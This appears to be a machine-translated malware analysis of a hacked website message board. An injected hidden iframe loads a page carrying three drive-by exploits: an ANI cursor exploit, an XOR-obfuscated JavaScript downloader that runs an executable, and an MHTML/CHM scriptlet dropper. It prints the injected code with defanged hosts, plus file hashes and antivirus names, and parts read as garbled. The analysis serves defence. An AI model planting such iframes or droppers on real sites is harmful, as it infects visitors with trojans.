EndurerOriginal
1Version
The message board page of this website:
/---
<IFRAME id = "fralyb" name = "fralyb2" src = "kh_lyb.aspx? User = 2 ** 5 *** "scrolling =" Auto "frameborder =" 0 "width = 100% Height =" 100% "> </iframe>
---/
Implanted code:
/---
<IFRAME src = hxxp: // cool ***. 4*7*5 *** 55.com/k3.htm width = 100 Height = 1 frameborder = 0> </iframe>
---/
Hxxp: // cool ***. 4*7*5 *** 55.com/k3.htm contains three malicious codes.
Malicious Code Segment 1:
/---
<Div style = "cursor: URL (hxxp: // cool ***. 4*7*5 *** 55.com/9.gif)"> </div>
---/
Hxxp: // cool ***. 4*7*5 *** 55.com/9.gifHack. suspiciousani
) Contains information: "by mr. OWEN [F. s.t]", using the ani vulnerability to download xx.exe
File Description: D:/test/xx.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:58:12
Modification time:
Access time:
Size: 14902 bytes, 14.566 KB
MD5: 046257b53f474770dd1e2a149b2ba823
Kaspersky reportsTrojan-Downloader.Win32.Small.eqe, Rising:Trojan. DL. Inject. xz.
Malicious Code Segment 2:
/---
VaR J = function (m) {return string. fromcharcode (M ^ 99 )};
Eval (J (5 )...... (Omitted )...... + J (67) + '');
---/
The decryption result is a Javascript script that uses Microsoft. XMLHTTP and SCR unzip pting. FileSystemObject to download the file kehu0739.exe and save it to % WINDIR %. The file name is defined by the UDF:
/---
Function Gn (n) {var number = math. Random () * N;
Return '~ TMP '+'. tmp ';}
---/
Generate, that is ~ TMP. tmp. Then run the command % WINDIR %/system32/cmd.exe/C % WINDIR %/~ through the ShellExecute method of the shell. Application Object Q /~ TMP. tmp to run.
Malicious Code segment 3:
/---
<Object style = "display: & # x6e; & # x6f; & # x6e; & # X65; "type =" Tex & #116 & #47 & #120 & #45 & #115 & #99 & #114 iptlet "Data =" & # x4d; & # x4b; & # x3a; & # X40; & # x4d; & # x53; & # x49; & # x54; sto & #114 & #101 & #58 & #109 & # effectml & # x3a; & # x63; & # x3a; & # x5c; & # x2e; & # x6d; HT & #33 hxxp: // cool ***. 4*7*5 ** 55.com/count.html&{x3a}&{x3a}/%6c%65%66t&%46htm "> </Object>
---/
After decryption
/---
<Object style = "display: none" type = "text/X-scriptlet" Data = "MK: @ msitstore: MHTML: C:/. MHT! Hxxp: // cool *****. 4*7*5 ***** 55.com/count.html:/%6c%65%66t.htm "> </Object>
---/
Hxxp: // cool ***. 4*7*5 *** 55.com/count.html is actually a CHM File, releasing and running the file QQ. exe
/---
File Description: D:/test/QQ. exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 13:39:46
Modification time: 13:39:46
Access time: 13:41:52
Size: 11208 bytes, 10.968 KB
MD5: f04973fb8267827f347594b373732290
Nspack 1.3-> North Star/Liu Xing Ping
---/
Rising news:Trojan. DL. Agent. alw
Scanned file: QQ. exe-infected |
QQ. exe-infected by Trojan-Downloader.Win32.Agent.ue
Statistics:
Known viruses: |
307397 |
Updated: |
30-04-2007 |
File size (Kb ): |
11 |
Virus bodies: |
1 |
Files: |
1 |
Warnings: |
0 |
Archives: |
0 |
Suspicious: |
0 |
|